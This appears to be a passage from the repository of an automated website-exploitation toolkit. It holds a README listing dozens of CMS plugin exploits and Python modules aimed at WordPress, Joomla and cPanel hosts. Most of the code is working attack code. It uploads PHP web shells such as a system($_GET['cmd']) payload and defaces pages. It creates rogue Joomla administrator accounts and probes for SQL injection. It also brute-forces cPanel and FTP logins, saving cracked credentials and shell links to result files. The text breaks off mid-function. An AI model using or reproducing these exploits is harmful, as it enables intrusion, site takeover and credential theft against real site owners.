 20 | 12- WooCommerce-ProductAddons
 21 | 13- CateGory-page-icons
 22 | 14- addblockblocker
 23 | 15- barclaycart
 24 | 16- Wp 4.7 Core Exploit
 25 | 17- eshop-magic
 26 | 18- HD-WebPlayer
 27 | 19- WP Job Manager
 28 | 20- wp-miniaudioplayer
 29 | 21- wp-support-plus
 30 | 22- ungallery Plugin
 31 | 23- WP User Frontend
 32 | 24- Viral-options
 33 | 25- Social Warfare
 34 | 26- jekyll-exporter
 35 | 27- cloudflare plugin
 36 | 28- realia plugin
 37 | 29- woocommerce-software
 38 | 30- enfold-child Theme
 39 | 31- contabileads plugin
 40 | 32- prh-api plugin
 41 | 33- dzs-videogallery plugin
 42 | 34- mm-plugin
 43 | 35- Wp-Install
 44 | 36- Auto BruteForce
 45 | </pre>
 46 | [+] Joomla
 47 | <pre>
 48 | 1- Com_adsmanager
 49 | 2- Com_alberghi
 50 | 3- Com_CCkJseblod
 51 | 4- Com_extplorer
 52 | 5- Com_Fabric
 53 | 6- Com_facileforms
 54 | 7- Com_Hdflvplayer
 55 | 8- Com_Jbcatalog
 56 | 9- Com_JCE
 57 | 10- Com_jdownloads
 58 | 11- Com_Joomanager
 59 | 12- Com_Macgallery
 60 | 13- Com_media
 61 | 14- Com_Myblog
 62 | 15- Com_rokdownloads
 63 | 16- Com_s5_media_player
 64 | 17- Com_SexyContactform
 65 | 18- Joomla core 3.x RCE
 66 | 19- Joomla core 3.x RCE [2019]
 67 | 20 - Joomla Core 3.x Admin Takeover
 68 | 21 - Auto BruteForce
 69 | 22 - Com_b2jcontact
 70 | 23 - Com_bt_portfolio
 71 | 24 - Com_civicrm
 72 | 25 - Com_extplorer
 73 | 26 - Com_facileforms
 74 | 27 - Com_FoxContent
 75 | 28 - Com_jwallpapers
 76 | 29 - Com_oziogallery
 77 | 30 - Com_redmystic
 78 | 31 - Com_simplephotogallery
 79 | 32 - megamenu module
 80 | 33 - mod_simplefileuploadv1
 81 | </pre>
 82 | [+] Drupal :
 83 | <pre>
 84 | 1- Drupal Add admin geddon1
 85 | 2- Drupal RCE geddon2
 86 | 3- Drupal 8 RCE RESTful
 87 | 4- Drupal mailchimp
 88 | 5- Drupal php-curl-class
 89 | 6- BruteForce
 90 | 7- Drupal SQL Add Admin
 91 | 8- Drupal 7 RCE
 92 | 9- bartik
 93 | 10- Avatarafd Config
 94 | 11- Drupal 8
 95 | 12- Drupal Default UserPass
 96 | </pre>
 97 | [+] Magento :
 98 | <pre>
 99 | 1- Shoplift
100 | 2- Magento Default user pass
101 | </pre>
102 | [+] Oscommerce
103 | <pre>
104 | 1- OsCommerce Core 2.3 RCE Exploit
105 | opencart
106 | </pre>
107 | [+] OTHER :
108 | <pre>
109 | 1- Env Exploit
110 | 2- SMTP CRACKER
111 | 3- CV
112 | </pre>
113 | 


--------------------------------------------------------------------------------
/Tools/cpanel.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | 
 3 | def Check(domain, user, password):
 4 |     if domain.startswith('http://'):
 5 |         domain = domain.replace('http://', '')
 6 |     elif domain.startswith("https://"):
 7 |         domain = domain.replace('https://', '')
 8 |     else:
 9 |         pass
10 |     passwordList = [password, user, user+'123', user + '1', user + '12', user + '!@#', user + '!@', user + '_123',
11 |                     user + '@!']
12 |     for passs in passwordList:
13 |         postData = {
14 |             'user': user,
15 |             'pass': passs
16 |         }
17 |         HeaderPost = {
18 |             'Accept': '*/*',
19 |             'Accept-Encoding': 'gzip, deflate, br',
20 |             'Accept-Language': 'en-US,en;q=0.5',
21 |             'Connection': 'keep-alive',
22 |             'Content-type': 'application/x-www-form-urlencoded',
23 |             'Cookie': 'cpsession=closed; timezone=America/Los_Angeles',
24 |             'Host': '{}:2083'.format(domain),
25 |             'Origin': 'https://{}:2083'.format(domain),
26 |             'Referer': 'https://{}:2083/logout/?locale=de'.format(domain),
27 |             'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0'
28 |         }
29 |         HeaderPost2 = {
30 |             'Accept': '*/*',
31 |             'Accept-Encoding': 'gzip, deflate, br',
32 |             'Accept-Language': 'en-US,en;q=0.5',
33 |             'Connection': 'keep-alive',
34 |             'Content-type': 'application/x-www-form-urlencoded',
35 |             'Cookie': 'cpsession=closed; timezone=America/Los_Angeles',
36 |             'Host': '{}:2083'.format(domain),
37 |             'Origin': 'http://{}:2083'.format(domain),
38 |             'Referer': 'http://{}:2083/logout/?locale=de'.format(domain),
39 |             'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0'
40 |         }
41 |         posturl2 = 'http://' + '{}:2083/login/?login_only=1'.format(domain)
42 | 
43 |         posturl = 'https://' + '{}:2083/login/?login_only=1'.format(domain)
44 | 
45 |         try:
46 |             Check = requests.post(posturl, data=postData, timeout=10, headers=HeaderPost)
47 |             if '"status":1,' in str(Check.content):
48 |                 with open('result/Cpanel.txt', 'a') as XW:
49 |                     XW.write(' {}/cpanel:{},{}\n'.format(domain, user, passs))
50 |             else:
51 |                 pass
52 |         except:
53 |             try:
54 |                 Check = requests.post(posturl2, data=postData, timeout=10, headers=HeaderPost2)
55 |                 if '"status":1,' in str(Check.content):
56 |                     with open('result/Cpanel.txt', 'a') as XW:
57 |                         XW.write(' {}/cpanel:{},{}\n'.format(domain, user, passs))
58 |                 else:
59 |                     pass
60 |             except:
61 |                 pass


--------------------------------------------------------------------------------
/Exploits/CVE_2008_3362Download_Manager.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
 6 | r = '\033[31m'
 7 | g = '\033[32m'
 8 | y = '\033[33m'
 9 | b = '\033[34m'
10 | m = '\033[35m'
11 | c = '\033[36m'
12 | w = '\033[37m'
13 | Jce_Deface_image = 'files/pwn.gif'
14 | pagelinesExploitShell = 'files/settings_auto.php'
15 | 
16 | 
17 | def Exploit(site):
18 |     try:
19 |         Checkneko = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/img/unlock.gif',
20 |                                  timeout=10, headers=Headers)
21 |         if 'GIF89a' in str(Checkneko.content):
22 |             PostDAta = {'dm_upload': ''}
23 |             fileDeface = {'upfile': open(Jce_Deface_image, 'rb')}
24 |             fileShell = {'upfile': open(pagelinesExploitShell, 'rb')}
25 |             requests.post('http://' + site, data=PostDAta, files=fileDeface, timeout=10, headers=Headers)
26 |             CheckIndex = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
27 |                                       Jce_Deface_image.split('/')[1])
28 |             if 'GIF89a' in str(CheckIndex.content):
29 |                 requests.post('http://' + site, data=PostDAta, files=fileShell, timeout=10, headers=Headers)
30 |                 requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
31 |                              pagelinesExploitShell.split('/')[1], timeout=10, headers=Headers)
32 |                 CheckShell = requests.get('http://' + site + '/wp-content/neko.php',
33 |                                           timeout=10, headers=Headers)
34 |                 if 'neko!!' in str(CheckShell.content):
35 |                     with open('result/Shell_results.txt', 'a') as writer:
36 |                         writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
37 |                                      pagelinesExploitShell.split('/')[1] + '\n')
38 |                     with open('result/Index_results.txt', 'a') as writer:
39 |                         writer.write(site + '/neko.htm' + '\n')
40 |                     return printModule.returnYes(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
41 |                 else:
42 |                     with open('result/Index_results.txt', 'a') as writer:
43 |                         writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
44 |                                      Jce_Deface_image.split('/')[1] + '\n')
45 |                     return printModule.returnYes(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
46 |             else:
47 |                 return printModule.returnNo(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
48 |         else:
49 |             return printModule.returnNo(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
50 |     except:
51 |         return printModule.returnNo(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
52 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2016_9838TakeAdminJoomla.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | 
13 | agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
14 | 
15 | 
16 | 
17 | def Exploit(site, email):
18 |     sess = requests.Session()
19 |     username = 'neko'
20 |     password = 'tegal1337'
21 |     try:
22 |         resp = sess.get('http://' + site + "/index.php/component/users/?view=login", headers=agent, timeout=10)
23 |         token = re.findall('<input type="hidden" name="(.*)" value="1"', str(resp.content))[0]
24 |     except:
25 |         return printModule.returnNo(site, 'CVE-2016-9838', 'Joomla! 3.x Add Admin', 'Joomla')
26 |     try:
27 |         Headers = {
28 |             'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0',
29 |             'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
30 |             'Accept-Language': 'en-US,en;q=0.5',
31 |             'Connection': 'keep-alive',
32 |             'Referer': 'http://{}/index.php/component/users/?view=registration'.format(site),
33 |             'Upgrade-Insecure-Requests': '1'
34 |         }
35 | 
36 |         data = {
37 |             'user[name]': username,
38 |             'user[username]': username,
39 |             'user[password1]': password,
40 |             'user[password2]': password,
41 |             'user[email1]': email,
42 |             'user[email2]': email,
43 |             'user[groups][]': '7',
44 |             'user[activation]': '0',
45 |             'user[block]': '0',
46 |             'form[name]': username,
47 |             'form[username]': username,
48 |             'form[password1]': password,
49 |             'form[password2]': password,
50 |             'form[email1]': email,
51 |             'form[email2]': email,
52 |             'form[option]': 'com_users',
53 |             'form[task]': 'user.register',
54 |             token: '1',
55 |         }
56 | 
57 | 
58 |         Req = sess.post('http://' + site + "/index.php/component/users/?task=user.register",
59 |                         data=data, timeout=10, headers=Headers)
60 |         if 'id="system-message"' in str(Req.content):
61 |             with open('result/AdminTakeover_results.txt', 'a') as writer:
62 |                 writer.write(site + '/administrator/index.php --> Active Link Sended to: {}\n  Username: {}\n'
63 |                                     '  Password: {}\n------------------------------------------\n'
64 |                              .format(email, username, password))
65 |             return printModule.returnYes(site, 'CVE-2016-9838', 'Joomla! 3.x Add Admin', 'Joomla')
66 |         else:
67 |             return printModule.returnNo(site, 'CVE-2016-9838', 'Joomla! 3.x Add Admin', 'Joomla')
68 |     except:
69 |         return printModule.returnNo(site, 'CVE-2016-9838', 'Joomla! 3.x Add Admin', 'Joomla')
70 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2015_4455_gravityforms.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | 
14 | 
15 | def Exploit(site):
16 |     try:
17 |         Grav_checker = requests.get('http://' + site + '/?gf_page=upload', timeout=5, headers=Headers)
18 |         if '"status" : "error"' in str(Grav_checker.content):
19 |             UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
20 |             fileDeface = {'file': open('files/grav.jpg', 'rb')}
21 |             post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'p.php5'}
22 |             url = "http://" + site + '/?gf_page=upload'
23 |             GoT = requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5)
24 |             if '.php5' in str(GoT.content):
25 |                 CheckShell = requests.get('http://' + site + '/wp-content/_input_3_p.php5',
26 |                                           timeout=10, headers=Headers)
27 |                 if 'neko!!' in str(CheckShell.content):
28 |                     Checkshell2 = requests.get('http://' + site + '/wp-content/neko.php', timeout=5,
29 |                                                headers=Headers)
30 |                     if 'neko!!' in str(Checkshell2.content):
31 |                         Checkshell = requests.get('http://' + site + '/wp-content/neko.php',
32 |                                                   timeout=10, headers=Headers)
33 |                         CheckIndex = requests.get('http://' + site + '/neko.htm',
34 |                                                   timeout=10, headers=Headers)
35 |                         if 'neko!!' in str(Checkshell.content):
36 |                             with open('result/Shell_results.txt', 'a') as writer:
37 |                                 writer.write(site + '/wp-content/neko.php' + '\n')
38 |                         if 'neko!!' in str(CheckIndex.content):
39 |                             with open('result/Index_results.txt', 'a') as writer:
40 |                                 writer.write(site + '/neko.htm' + '\n')
41 |                         return printModule.returnYes(site, 'CVE-2015-4455', 'Gravity forms Shell', 'Wordpress')
42 |                     else:
43 |                         return printModule.returnNo(site, 'CVE-2015-4455', 'Gravity forms Shell', 'Wordpress')
44 |                 else:
45 |                     return printModule.returnNo(site, 'CVE-2015-4455', 'Gravity forms Shell', 'Wordpress')
46 |             else:
47 |                 return printModule.returnNo(site, 'CVE-2015-4455', 'Gravity forms Shell', 'Wordpress')
48 |         else:
49 |             return printModule.returnNo(site, 'CVE-2015-4455', 'Gravity forms Shell', 'Wordpress')
50 |     except:
51 |         return printModule.returnNo(site, 'CVE-2015-4455', 'Gravity forms Shell', 'Wordpress')
52 | 


--------------------------------------------------------------------------------
/Exploits/Com_FoxContent.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | from Tools import getSMTP
 5 | from Tools import wsoShellUploaderModule
 6 | 
 7 | payloadshell = '"neko!!<?php {});?>"'.format("system({}".format('$_GET["cmd"]'))
 8 | Headers = {
 9 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
10 | }
11 | 
12 | def Exploit(site):
13 |     try:
14 |         Checker = requests.get('http://' + site + "/components/com_foxcontact/foxcontact.php", timeout=10, headers=Headers)
15 |         if 'Restricted access' in str(Checker.content):
16 |             GotCid = requests.get('http://' + site + '/index.php?option=com_foxcontact&amp;view=invalid',
17 |                                   timeout=10, headers=Headers)
18 |             cids = re.findall('foxcontact&amp;Itemid=(.*?)" >', str(GotCid.content))
19 |             flag = 0
20 |             for cid in cids:
21 |                 cid = str(cid)
22 |                 URLS = ["/components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../{}".format(
23 |                     cid, cid, 'neko.php'),
24 |                             "/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}"
25 |                             "?cid={}&mid={}&qqfile=/../../{}".format(
26 |                                 cid, cid, cid, 'neko.php'),
27 |                             "/index.php?option=com_foxcontact&amp;view=loader&amp;type=uploader&amp;"
28 |                             "owner=module&amp;id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../{}".format(
29 |                                 cid, cid, cid, cid, 'neko.php'),
30 |                             "/components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../{}".format(
31 |                                 cid, cid,'neko.php')]
32 |                 for path in URLS:
33 |                     Exp = site + path
34 |                     requests.post('http://' + Exp, data=payloadshell, timeout=10, headers=Headers)
35 |                     SH = requests.get('http://' + site + '/components/com_foxcontact/neko.php', timeout=10, headers=Headers)
36 |                     if 'neko!!' in str(SH.content):
37 |                         with open('result/Shell_results.txt', 'a') as writer:
38 |                             writer.write(site + '/components/com_foxcontact/neko.php?cmd=uname -a' + '\n')
39 |                         getSMTP.JooomlaSMTPshell(site + '/components/com_foxcontact/neko.php?cmd=id')
40 |                         WSo = wsoShellUploaderModule.UploadWso(site + '/components/com_foxcontact/neko.php?cmd=id')
41 |                         if WSo == 'No':
42 |                             pass
43 |                         else:
44 |                             with open('result/WSo_Shell.txt', 'a') as Wr:
45 |                                 Wr.write('{}\n'.format(WSo))
46 |                         flag = 1
47 |                         break
48 |                     else:
49 |                        pass
50 |             if flag == 0:
51 |                 return printModule.returnNo(site, 'N/A', 'Com_FoxContact', 'Joomla')
52 |             else:
53 |                 return printModule.returnYes(site, 'N/A', 'Com_FoxContact', 'Joomla')
54 |         else:
55 |             return printModule.returnNo(site, 'N/A', 'Com_FoxContact', 'Joomla')
56 |     except:
57 |         return printModule.returnNo(site, 'N/A', 'Com_FoxContact', 'Joomla')
58 | 


--------------------------------------------------------------------------------
/Tools/Sqli.py:
--------------------------------------------------------------------------------
 1 | import requests, re
 2 | from Exploits import printModule
 3 | from Tools import cpanel
 4 | from BruteForce import FTPBruteForce
 5 | 
 6 | def Exploit(site):
 7 |     if site.startswith("http://"):
 8 |         site = site.replace("http://", "")
 9 |     elif site.startswith("https://"):
10 |         site = site.replace("https://", "")
11 |     else:
12 |         pass
13 |     agent = {
14 |         'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
15 |     }
16 |     try:
17 |         GetLink = requests.get('http://' + site, timeout=10, headers=agent)
18 |         urls = re.findall(r'href=[\'"]?([^\'" >]+)', str(GetLink.content))
19 |         if len(urls) != 0:
20 |             return CheckSqliURL(site, urls)
21 |         else:
22 |             pass
23 |     except:
24 |         pass
25 | 
26 | 
27 | def CheckSqliURL(site, urls):
28 |     MaybeSqli = []
29 |     for url in urls:
30 |         try:
31 |             if '.php?' in str(url):
32 |                 MaybeSqli.append(site + '/' + url)
33 |         except:
34 |             pass
35 |     if len(MaybeSqli) != 0:
36 |         return CheckSqli(MaybeSqli, site)
37 |     else:
38 |         return printModule.returnNo(site, 'N/A', 'Sql Injection', 'unknown')
39 | 
40 | 
41 | def CheckSqli(MaybeSqli, site):
42 |     for url in MaybeSqli:
43 |         try:
44 |             error = ["DB Error", "SQL syntax;", "mysql_fetch_assoc", "mysql_fetch_array", "mysql_num_rows",
45 |                      "is_writable",
46 |                      "mysql_result", "pg_exec", "mysql_result", "mysql_num_rows", "mysql_query", "pg_query",
47 |                      "System Error",
48 |                      "io_error", "privilege_not_granted", "getimagesize", "preg_match", "mysqli_result", 'mysqli']
49 | 
50 |             if url.startswith("http://"):
51 |                 url = url.replace("http://", "")
52 |             elif url.startswith("https://"):
53 |                 url = url.replace("https://", "")
54 |             else:
55 |                 pass
56 |             agent = {
57 |                 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
58 |             }
59 |             for s in error:
60 |                 Checksqli = requests.get('http://' + url + "'", timeout=5, headers=agent)
61 |                 if s in str(Checksqli.content):
62 |                     SQLI = url.replace("'", "")
63 |                     if SQLI.startswith("http://"):
64 |                         SQLI = SQLI.replace("http://", "")
65 |                     elif SQLI.startswith("https://"):
66 |                         SQLI = SQLI.replace("https://", "")
67 |                     else:
68 |                         pass
69 |                     if 'http://' in SQLI:
70 |                         pass
71 |                     else:
72 |                         with open('result/SqlInjection_targets.txt', 'a') as xx:
73 |                             xx.write('http://' + SQLI + '\n')
74 |                         try:
75 |                             Username = re.findall('/home/(.*)/public_html/', str(Checksqli.content))[0]
76 |                             cpanel.Check(site, Username, 'Cpanel')
77 |                             FTPBruteForce.CheckFTPport(site, Username)
78 |                         except:
79 |                             pass
80 |                     return printModule.returnYes(SQLI, 'N/A', 'Sql Injection', 'unknown')
81 |                 else:
82 |                     pass
83 |             break
84 |         except:
85 |             pass
86 | 
87 | 


--------------------------------------------------------------------------------
/Exploits/wp_content_injection.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import json, requests, re
 3 | from Exploits import printModule
 4 | 
 5 | Headers = {
 6 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
 7 | }
 8 | 
 9 | 
10 | def GetWordpressPostId(zzz):
11 |     try:
12 |         PostId = requests.get('http://' + zzz + '/wp-json/wp/v2/posts/', timeout=5, headers=Headers)
13 |         wsx = re.findall('"id":(.+?),"date"', PostId.content)
14 |         postid = wsx[1].strip()
15 |         return postid
16 |     except:
17 |         pass
18 | 
19 | 
20 | def Exploit(site):
21 |     try:
22 |         zaq = GetWordpressPostId(site)
23 |         headers = {'Content-Type': 'application/json',
24 |                    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0'}
25 |         xxx = str(zaq) + 'bbx'
26 |         data = json.dumps({
27 |             'content': '<h1>neko!! Path it now!!\n<p><title>neko!! Path it now!!<br />\n</title></p></h1>\n',
28 |             'title': 'neko!! Path it now!!',
29 |             'id': xxx,
30 |             'link': '/x-htm/',
31 |             'slug': '"/x-htm/"'
32 |         })
33 |         GoT = requests.post('http://' + site + '/wp-json/wp/v2/posts/' + str(zaq), data=data,
34 |                             headers=headers, timeout=10)
35 |         if GoT:
36 |             CheckIndex = 'http://' + site + '/x.htm'
37 |             zcheck = requests.get(CheckIndex, timeout=10, headers=Headers)
38 |             if 'neko!!' in zcheck.content:
39 |                 with open('result/Index_results.txt', 'a') as writer:
40 |                     writer.write(site + '/x.htm' + '\n')
41 |                 return printModule.returnYes(site, 'N/A', 'Wordpress 4.7 Content Injection', 'Wordpress')
42 |             else:
43 |                 return printModule.returnNo(site, 'N/A', 'Wordpress 4.7 Content Injection', 'Wordpress')
44 |         else:
45 |             return printModule.returnNo(site, 'N/A', 'Wordpress 4.7 Content Injection', 'Wordpress')
46 |     except:
47 |         return printModule.returnNo(site, 'N/A', 'Wordpress 4.7 Content Injection', 'Wordpress')
48 | 
49 | 
50 | def wp_contentShellInject(site):
51 |     try:
52 |         zaq = GetWordpressPostId(site)
53 |         headers = {'Content-Type': 'application/json',
54 |                    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0'}
55 |         xxx = str(zaq) + 'bbx'
56 |         data = json.dumps({
57 |             'content': "neko!!shell<script src='/sh.js'></script>",
58 |             'title': 'Click Here neko!!',
59 |             'id': xxx,
60 |             'link': '/sh-htm/',
61 |             'slug': '"/sh-htm/"'
62 |         })
63 |         GoT = requests.post('http://' + site + '/wp-json/wp/v2/posts/' + str(zaq), data=data,
64 |                             headers=headers, timeout=10)
65 |         if GoT:
66 |             CheckIndex = 'http://' + site + '/sh.htm'
67 |             zcheck = requests.get(CheckIndex, timeout=10, headers=Headers)
68 |             if 'neko!!' in zcheck.content:
69 |                 with open('result/Shell_results.txt', 'a') as writer:
70 |                     writer.write(site + '/wp-content/plugins/akismet/index.php?cmd=id --> '
71 |                                         'After js execution in admin panel, you will have shell access ' + '\n')
72 |             else:
73 |                 pass
74 |         else:
75 |             pass
76 |     except:
77 |         pass
78 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2019_15866_crelly_slider.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, sys
 3 | r = '\033[31m'
 4 | g = '\033[32m'
 5 | y = '\033[33m'
 6 | b = '\033[34m'
 7 | m = '\033[35m'
 8 | c = '\033[36m'
 9 | w = '\033[37m'
10 | 
11 | 
12 | def Exploit(site, username, password):
13 |     print('[!] Exploit Started! --> {}'.format(site))
14 |     Login = 'http://' + site + '/wp-login.php'
15 |     HeadersLogin = {
16 |         'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0',
17 |         'Connection': 'keep-alive',
18 |         'Cache-Control': 'max-age=0',
19 |         'Origin': 'http://localhost',
20 |         'Upgrade-Insecure-Requests': '1',
21 |         'Content-Type': 'application/x-www-form-urlencoded',
22 |         'Sec-Fetch-Mode': 'navigate',
23 |         'Sec-Fetch-User': '?1',
24 |         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,'
25 |                   'image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
26 |         'Sec-Fetch-Site': 'same-origin',
27 |         'Referer': 'http://{}/wp-login.php?loggedout=true'.format(site),
28 |         'Accept-Encoding': 'gzip, deflate, br',
29 |         'Accept-Language': 'en-US,en;q=0.9'
30 |     }
31 |     LoginData = {
32 |         'log': username,
33 |         'pwd': password,
34 |         'wp-submit': 'Log+In',
35 |         'redirect_to': 'http://{}/wp-admin/'.format(site),
36 |         'testcookie': 1
37 |     }
38 |     Login = requests.post(Login, data=LoginData, headers=HeadersLogin, timeout=10)
39 |     if 'wordpress_logged_in' in str(Login.cookies):
40 |         print(' [+] Step 1 Done! successfully Logged In!')
41 |         Exp = 'http://' + site + '/wp-admin/admin-ajax.php'
42 |         print(' [+] Step 2 started! Trying Set Cookies!')
43 |         Huntcok = str(Login.cookies)
44 |         try:
45 |             PHPSESSID = Login.cookies['PHPSESSID']
46 |             wploggedin = 'wordpress_logged_in_' + Huntcok.split('wordpress_logged_in_')[1].split(' for ')[0]
47 |             print(' [!] Cookies Set successfully!')
48 |         except:
49 |             print(' [-] Cookies Set Failed!')
50 |             sys.exit()
51 |         try:
52 |             wpbff = 'wordpress_bbf' + Huntcok.split('wordpress_bbf')[1].split(' for ')[0]
53 |             print(' [+] ALL Cookies Sets successfully!')
54 |         except:
55 |             print(' [-] Cookies Set Failed!')
56 |             sys.exit()
57 | 
58 |         Headers = {
59 |             'Origin': 'http://localhost',
60 |             'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0',
61 |             'X-Requested-With': 'XMLHttpRequest',
62 |             'Sec-Fetch-Mode': 'cors',
63 |             'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryHdKriGTCwKotJRjx',
64 |             'Sec-Fetch-Site': 'same-origin',
65 |             'Referer': 'http://{}/wp-admin/admin.php'.format(site),
66 |             'Accept-Encoding': 'gzip, deflate, br',
67 |             'Accept-Language': 'en-US,en;q=0.9',
68 |             'Set-Cookie': "{};PHPSESSID={};{};{};".format(wploggedin,PHPSESSID,wpbff,
69 |                                                          'wordpress_test_cookie=WP+Cookie+check')
70 |         }
71 |         PostData = {
72 |             'action': 'crellyslider_importSlider',
73 |             'file': open('files/rock.zip', 'rb')
74 |         }
75 |         rr = requests.post(Exp, data=PostData, headers=Headers)
76 |         print(' [+] Step 3 Done! successfully Sent Payloads!')
77 |         print(' [!] Step 4 Started! Checking For Uploaded Shell...')
78 |         print(rr.content)
79 | 
80 | 
81 | 


--------------------------------------------------------------------------------
/BruteForce/FTPBruteForce.py:
--------------------------------------------------------------------------------
 1 | import requests, re, socket, ftplib, threading, time
 2 | 
 3 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
 4 | 
 5 | 
 6 | def CheckFTPport(Target, USername):
 7 |     if '/' in USername:
 8 |         USername = str(USername).split('/')[0]
 9 |     if Target.startswith('http://'):
10 |         Target = Target.replace('http://', '')
11 |     elif Target.startswith("https://"):
12 |         Target = Target.replace('https://', '')
13 |     else:
14 |         pass
15 |     try:
16 |         Ip = socket.gethostbyname(Target)
17 |     except:
18 |         Ip = Target
19 |     try:
20 |         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
21 |         connect = s.connect_ex((Ip, 21))
22 |         if connect == 0:
23 |             passwords = [USername, 'FTP@123', 'ftp123', 'password', 'password1', 'fuckyou!', 'ftpftp123',
24 |                          USername + '123', USername + '12', USername + '1', USername + '@!', USername + '!@#',
25 |                          USername + '@ftp', USername + '@2020', USername + '@2019', USername + '@2018',
26 |                          USername + '1997', USername + '2000', USername + '2009', USername + '2019', USername + '2018']
27 |             thread = []
28 |             for password in passwords:
29 |                 t = threading.Thread(target=bruteLogin, args=(Target, Ip, USername, password))
30 |                 t.start()
31 |                 thread.append(t)
32 |                 time.sleep(0.1)
33 |             for j in thread:
34 |                 j.join()
35 |         else:
36 |             s.close()
37 |     except:
38 |         pass
39 | 
40 | def bruteLogin(Site, Target, Username, Password):
41 |     try:
42 |         ftp = ftplib.FTP(Target)
43 |         ftp.login(Username, Password)
44 |         with open('result/CrackedFTP.txt', 'a') as XW:
45 |             XW.write('Site: {}\n  IP: {}\n  Username: {}\n  Password: {}\n--------------------------------\n'.
46 |                      format(Site, Target, Username, Password))
47 |         ftp.quit()
48 |     except:
49 |         pass
50 | 
51 | def Exploit(url):
52 |     if url.startswith('http://'):
53 |         url = url.replace('http://', '')
54 |     elif url.startswith("https://"):
55 |         url = url.replace('https://', '')
56 |     else:
57 |         pass
58 |     try:
59 |         Get_page = requests.get('http://' + url, timeout=10)
60 |         if '/wp-content/' in Get_page.text:
61 |             Hunt_path = requests.get('http://' + url + '/wp-includes/ID3/module.audio.ac3.php', timeout=10)
62 |             def Hunt_Path_User():
63 |                 try:
64 |                     find = re.findall('/home/(.*)/public_html/wp-includes/ID3/module.audio.ac3.php', Hunt_path.text)
65 |                     x = find[0].strip()
66 |                     return x
67 |                 except:
68 |                     pass
69 | 
70 |             def Hunt_Path_Host():
71 |                 try:
72 |                     find = re.findall("not found in <b>(.*)wp-includes/ID3/module.audio.ac3.php", Hunt_path.text)
73 |                     x = find[0].strip()
74 |                     return x
75 |                 except:
76 |                     pass
77 |             Cpanel_username = Hunt_Path_User()
78 |             Path_Host = Hunt_Path_Host()
79 |             if Cpanel_username == None:
80 |                 pass
81 |             else:
82 |                 CheckFTPport(url, Cpanel_username)
83 |             if Path_Host == None:
84 |                 pass
85 |             else:
